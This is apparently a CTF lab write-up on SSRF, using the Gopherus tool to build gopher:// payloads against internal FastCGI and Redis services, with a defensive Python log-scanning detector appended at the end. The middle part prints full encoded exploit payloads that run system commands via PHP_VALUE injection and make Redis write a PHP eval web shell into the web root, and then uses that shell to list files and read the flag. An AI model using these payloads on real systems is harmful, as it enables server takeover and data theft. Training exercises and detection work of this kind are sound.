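CTFHub SSRF: FastCGI & Redis protocols
FastCGI protocol
This time we need to attack the FastCGI protocol. The attached article may be of some help.
First we need to understand what the protocol looks like (see the article in CTFHub for details).
For this level we can try solving it from Linux (**Python 2 must be installed, otherwise Gopherus cannot be read!** Also download the Gopherus script.)
How to install Python 2 on Linux:
Reference blog: "A perfect solution for installing Python 2.7 on Linux" (你懂了我的冬天's blog, CSDN)
How to download the Gopherus script:
Using the script:
cd Gopherus
python2 gopherus.py --exploit fastcgi
First pick a PHP page that currently exists; choose the home page
index.php, and run ls as the first command
Then cat
Note: when encoding, remove any stray spaces or line breaks, otherwise the flag cannot be obtained
After obtaining the payload, we need to URL-encode it one more time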
?url=gopher%3A%2F%2F127.0.0.1%3A9000%2F_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%25F6%2506%2500%250F%2510SERVER_SOFTWAREgo%2520%2F%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP%2F1.1%250E%2502CONTENT_LENGTH59%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A%2F%2Finput%250F%2509SCRIPT_FILENAMEindex.php%250D%2501DOCUMENT_ROOT%2F%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%253B%2504%2500%253C%253Fphp%2520system%2528%2527cat%2520%2Ff%252A%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500
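Visit the address directly,
and the flag is obtained
Redis protocol
This time let's attack the Redis protocol. redis://127.0.0.1:6379. Reference material? There is none! Find it yourself!
Let's first learn about the Redis protocol
The key to clearing this level is again the Gopherus script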
python2 gopherus.py --exploit redis
Then URL-encode it once more:
gopher%3A%2F%2F127.0.0.1%3A6379%2F_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252447%250D%250A%250A%250A%253C%253Fphp%2520phpinfo%2528%2529%253B%2520%2540eval%2528%2524_POST%255B%2527shell%2527%255D%2529%253B%253F%253E%2520%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A
Then submit it to the web page:
A 504 page appears, which means the upload succeeded; if you want to be sure, you can check shell.php
?url=gopher%3A%2F%2F127.0.0.1%3A6379%2F_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252432%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_GET%255B%2522feng%2522%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25248%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A
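Then connect with AntSword; the connection failed (not sure why, it's quite a mystery)
No choice but to try another way:
Run the script again and change the script content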
'<?php eval($_GET["shell"]);?>'
Upload again, then access it with GET:
shell.php?shell=system("ls /");
shell.php?feng=system("cat /flag_44c78dae075af9658640863a76166df9");
Click submit, success!
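
Seen from the defender's side, both requests above have the same shape: a url parameter carrying a gopher:// URL to 127.0.0.1 whose body is percent-encoded twice. The following added example (not part of the original write-up or of Gopherus) decodes the parameter until it stops changing and flags the scheme, the internal address and the FastCGI/Redis markers; the function names, the marker list and the request lines are assumptions constructed for illustration.

```python
import ipaddress
from urllib.parse import parse_qs, unquote, urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Byte markers taken from the two payloads shown in this write-up.
MARKERS = {
    "fastcgi": (b"PHP_VALUE", b"auto_prepend_file", b"SCRIPT_FILENAME"),
    "redis": (b"flushall", b"dbfilename"),
}
# Constructed request lines; the gopher ones are shortened from the payloads above.
SAMPLE_LINES = [
    "GET /?url=http%3A%2F%2Fexample.com%2Fnews HTTP/1.1",
    "GET /?url=gopher%3A%2F%2F127.0.0.1%3A6379%2F_%252A1%250D%250A"
    "%25248%250D%250Aflushall%250D%250A HTTP/1.1",
    "GET /?url=gopher%3A%2F%2F127.0.0.1%3A9000%2F_%250F%2509"
    "SCRIPT_FILENAMEindex.php HTTP/1.1",
]

def fully_decode(value, max_rounds=5):
    """Percent-decode until the text stops changing (nested encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(value, encoding="latin-1")
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(request_line):
    """Return findings for every url= parameter in one HTTP request line."""
    findings = []
    target = request_line.split(" ")[1]
    # parse_qs does the first decode, as the web server does for PHP.
    params = parse_qs(urlsplit(target).query, encoding="latin-1")
    for raw in params.get("url", []):
        parts = urlsplit(raw)
        if parts.scheme.lower() not in ALLOWED_SCHEMES:
            findings.append("scheme:" + parts.scheme.lower())
        try:
            ip = ipaddress.ip_address(parts.hostname or "")
            if ip.is_loopback or ip.is_private:
                findings.append("internal:%s:%s" % (ip, parts.port))
        except ValueError:
            pass  # DNS name: resolve it and re-check the address in real use
        body = fully_decode(raw).encode("latin-1", "replace")
        for proto, words in MARKERS.items():
            if any(word in body for word in words):
                findings.append("payload:" + proto)
    return findings

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(inspect_request(line) or "clean", "<-", line[:60])
```

The same scheme and address checks belong in the application before it fetches the URL; the log scan only shows which requests would have been rejected.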